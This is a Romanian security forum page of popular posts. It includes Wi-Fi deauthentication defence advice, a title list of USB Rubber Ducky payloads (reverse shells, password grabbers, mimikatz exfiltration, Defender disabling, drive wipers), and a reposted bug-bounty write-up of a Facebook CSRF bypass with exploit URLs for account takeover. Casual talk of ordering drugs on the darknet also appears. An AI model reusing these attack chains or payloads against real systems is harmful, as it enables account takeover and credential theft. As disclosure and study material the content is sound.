Jump to content

Leaderboard


Popular Content

Showing content with the highest reputation on 02/15/19 in all areas

  1. 1 point
    Teoretic, nu prea ai ce face impotriva unui atac de genul, 802.11 permite lucrul asta. Asta este mai mult o problema dpdv al threat modeling, si nu a tehnologiei. Ai putea totusi sa faci viata atacatorului putin mai grea; ce-mi vine acum in minte: majoritatea adaptoarelor/cipurilor folosite pentru acest lucru lucreaza doar pe 2.4 GHz, iar majoritatea tool-urilor care trimit pachete de deautentificare o fac 'directional' catre clientii AP-urilor vizate (nu stii AP, nu cunosti in mod cert clientii - atentie, clientii fac leak la numele AP-urilor pe care le cauta si te dai de gol). Avand aceste doua lucruri in minte, poti folosi un router dual-band strict pe 5 GHz, sau daca sunt necesare retele pe ambele plaji de frecvente (2.4 si 5), te asiguri ca numele celor doua retele nu au legatura intre ele, si ca MAC-urile lor sunt foarte diferite - majoritatea vendorilor schimba ultimii 1-2 octeti la retelele wifi de pe acelasi device. De ce totusi nu iti permiti ca clientii sa piarda conexiunea? Se poate implementa o verificare simpla, care permite sistemului sa mearga in continuare fara clienti, avand in vedere ca re-autentificarea se face foarte rapid. Ar mai fi o treaba sa comunici prin BT, dar ai spus ca schimbarea tehnologiei nu se ia in considerare, si totodata exista riscuri mari si acolo.
  2. 1 point
  3. 1 point
    Vezi sa nu mori impuscat, t/c Edit// du-te in olanda daca vrei sa fumezi, Edit2: obamama avea 100mil pe cap pt un lunetist, merkel 500, stai in banca ta Edit3/// platesti aprox 70 € dus intors si fumezi de te spargi, all inclusive
  4. 1 point
    Links : https://github.com/hak5darren/USB-Rubber-Ducky/wiki/Payloads - bomboane https://roothaxor.gitlab.io/ducky2arduino_stable/ - Ducky to Arduino Convertor Payload - Hello World Payload - WiFi key grabber Payload - Basic Terminal Commands Ubuntu Payload - Information Gathering Ubuntu Payload - Hide CMD Window Payload - Netcat-FTP-download-and-reverse-shell Payload - Wallpaper Prank Payload - YOU GOT QUACKED! Payload - Reverse Shell Payload - Reverse Shell With Persistence Payload - Fork Bomb Payload - Utilman Exploit Payload - WiFi Backdoor Payload - Non-Malicious Auto Defacer Payload - Lock Your Computer Message Payload - Ducky Downloader Payload - Ducky Phisher Payload - FTP Download / Upload Payload - Restart Prank Payload - Silly Mouse, Windows is for Kids Payload - Windows Screen rotation hack Payload - Powershell Wget + Execute Payload - mimikatz payload Payload - MobileTabs Payload - Create Wireless Network Association (AUTO CONNECT) PINEAPPLE Payload - Retrieve SAM and SYSTEM from a live file system Payload - Ugly Rolled Prank Payload - XMAS Payload - Pineapple Assocation (VERY FAST) Payload - WiFun v1.1 Payload - MissDirection Payload - Remotely Possible Payload - Batch Wiper/Drive Eraser Payload - Generic Batch Payload - Paint Hack Payload - Local DNS Poisoning Payload - Deny Net Access Payload - RunEXE from SD Payload - Run Java from SD Payload - OSX Sudo Passwords Grabber Payload - OSX Root Backdoor Payload - OSX User Backdoor Payload - OSX Local DNS Poisoning Payload - OSX Youtube Blaster Payload - OSX Photo Booth Prank Payload - OSX Internet Protocol Slurp Payload - OSX Ascii Prank Payload - OSX iMessage Capture Payload - OSX Grab Minecraft Account Password and upload to FTP Payload - OS X Wget and Execute Payload - OSX Passwordless SSH access (ssh keys) Payload - OSX Bella RAT Installation Payload - OSX Sudo for all users without password Payload - MrGray's Rubber Hacks Payload - Copy File to Desktop Payload - Youtube Roll Payload - Disable AVG 2012 Payload - Disable AVG 2013 Payload - EICAR AV test Payload - Download mimikatz, grab passwords and email them via gmail Payload - Hotdog Wallpaper Payload - Android 5.x Lockscreen Payload - Chrome Password Stealer Payload - Website Lock Payload - Windows 10 : Download & Change Wallpaper Payload - Windows 10 : Download & Change Wallpaper another version Payload - Windows 10 : Download and execute file with Powershell Payload - Windows 10 : Disable windows defender Payload - Windows 10 : Disable Windows Defender through powershell Payload - Windows 10 : Wifi, Chrome Dump & email results Payload - Windows 7 : Logoff Prank Payload - Netcat Reverse Shell Payload - Fake Update screen Payload - Rickroll Payload - Fast Meterpreter Payload - Data-Exfiltration / Backdoor
  5. 1 point
  6. 1 point
  7. 1 point
    Posted on February 12, 2019 by qw Facebook CSRF protection bypass which leads to Account Takeover. This bug could have allowed malicious users to send requests with CSRF tokens to arbitrary endpoints on Facebook which could lead to takeover of victims accounts. In order for this attack to be effective, an attacker would have to trick the target into clicking on a link. Demonstration This is possible because of a vulnerable endpoint which takes another given Facebook endpoint selected by the attacker along with the parameters and make a POST request to that endpoint after adding the fb_dtsg parameter. Also this endpoint is located under the main domain www.facebook.com which makes it easier for the attacker to trick his victims to visit the URL. The vulnerable endpoint is: https://www.facebook.com/comet/dialog_DONOTUSE/?url=XXXX where XXXX is the endpoint with parameters where the POST request is going to be made (the CSRF token fb_dtsg is added automatically to the request body). This allowed me to make many actions if the victim visits this URLs. Some of these are: Make a post on timeline: https://www.facebook.com/comet/dialog_DONOTUSE/?url= /api/graphql/%3fdoc_id=1740513229408093%26variables={"input":{"actor_id":{TARGET_ID},"client_mutation_id":"1","source":"WWW","audience":{"web_privacyx":"REDECATED"},"message":{"text":"TEXT","ranges":[]}}} Delete Profile Picture: https://www.facebook.com/comet/dialog_DONOTUSE/? url=/profile/picture/remove_picture/%3fdelete_from_album=1%26profile_id={TARGET_ID} Trick user to delete their account (After changing language with “locale” parameter) https://www.facebook.com/comet/dialog_DONOTUSE/? url=/help/delete_account/dialog/%3f__asyncDialog=0%26locale=fr_FR This will promote a password confirmation dialog, if the victim enters his password then his account will be deleted. Account Takeover Approach To takeover the account, we have to add a new email address or phone number to the victim account. The problem here is that the victim has to visit two separate URLs , one to add the email/phone and one to confirm it because the “normal” endpoints used to add emails or phone numbers don’t have a “next” parameter to redirect the user after a successful request. So to bypass this, i needed to find endpoints where the “next” parameter is present so the account takeover could be made with a single URL. 1) We authorize the attacker app as the user then we redirect to https://www.facebook.com/v3.2/dialog/oauthwhich will automatically redirect to the attacker website with access_token having the scopes allowed to that app (this happens without user interaction because the app is already authorized using the endpoint /ajax/appcenter/redirect_to_app). This URL should be sent to the user: https://www.facebook.com/comet/dialog_DONOTUSE/?url= /ajax/appcenter/redirect_to_app%3fapp_id={ATTACKER_APP}%26ref=appcenter_top_grossing%26redirect_uri=https%3a//www.facebook.com/v3.2/dialog/oauth%3fresponse_type%3dtoken%26client_id%3d{ATTACKER_APP}%26redirect_uri%3d{DOUBLE_URL_ENCODED_LINK}%26scope%3d&preview=0&fbs=125&sentence_id&gift_game=0&scopes[0]=email&gdpv4_source=dialog This step is needed for multiple things: First to use the endpoint /v3.2/dialog/oauth to bypass Facebook redirect protection in the “next” parameter which blocks redirecting attempts to external websites even if they are made using linkshim. Second to identify each victim using the token received which will help later to extract the confirmation code for that specific user. 2)The attacker website receives the access token of the user , creates an email for him under that domain and redirect the user to : https://www.facebook.com/comet/dialog_DONOTUSE/? url=/add_contactpoint/dialog/submit/%3fcontactpoint={EMAIL_CHOSEN}%26next= /v3.2/dialog/oauth%253fresponse_type%253dtoken%2526client_id%253d{ATTACKER_APP}%2526redirect_uri%253d{DOUBLE_URL_ENCODED_LINK] This URL does the follow: First it links an email to the user account using the endpoint /add_contactpoint/dialog/submit/ (no password confirmation is required). After the linking, it redirects to the selected endpoint in “next” paramter: "/v3.2/dialog/oauth?response_type=token&client_id={ATTACKER_APP}&redirect_uri={ATTACKER_DOMAIN}" which will redirect to the “ATTACKER_DOMAIN” again with the user access_token. 3) The attacker website receives the “access_token”, extract the user ID then search for the email received for that user and gets the confirmation link then redirects again to : https://www.facebook.com/confirmcontact.php?c={CODE}&z=0&gfid={HASH} (CODE and HASH are in the email received from Facebook) This method is simpler for the attacker but after the linking the endpoint redirects the victim to https://www.facebook.com/settings?section=email which expose the newly added email so the confirmation could be done using the /confirm_code/dialog/submit/ endpoint which have a “next” parameter that could redirect the victim to the home page after the confirmation is made. 4) The email is now added to the victim account, the attacker could reset the password and takeover the account. The attack seems long but it’s done in a blink of an eye and it’s dangerous because it doesn’t target a specific user but anyone who visits the link in step 1 (This is done with simple scripts hosted in the attacker website) Timeline Jan 26, 2018 — Report Sent Jan 26, 2018 —  Acknowledged by Facebook Jan 28, 2018 —  More details sent Jan 31, 2018 — Fixed by Facebook Feb 12, 2018 — $25,000  Bounty Awarded by Facebook Sursa: https://ysamm.com/?p=185
  8. -1 points
    Eu iti sugerez sa eviti dark web unele lucruri sunt mai ingrozitoare decat ai crede parerea mea !
  9. -2 points
    am prieteni care au comandat weed de pe deep web si le-au venit fara nicio problema, discretie maxima etc, si nu ai o treaba, amu tot o sa mai fie unu care pica de tap ispasitor, life is life.
×
×
  • Create New...